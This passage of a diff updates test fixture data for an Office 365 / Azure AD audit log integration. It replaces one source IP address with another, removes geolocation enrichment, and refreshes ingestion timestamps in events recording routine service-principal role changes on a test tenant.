AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -9867,25 +9021,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9899,7 +9035,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -10035,7 +9171,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -10047,12 +9183,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036378400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125113600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -10078,25 +9214,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -10110,7 +9228,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -10246,7 +9364,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -10258,12 +9376,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036382600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125120100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 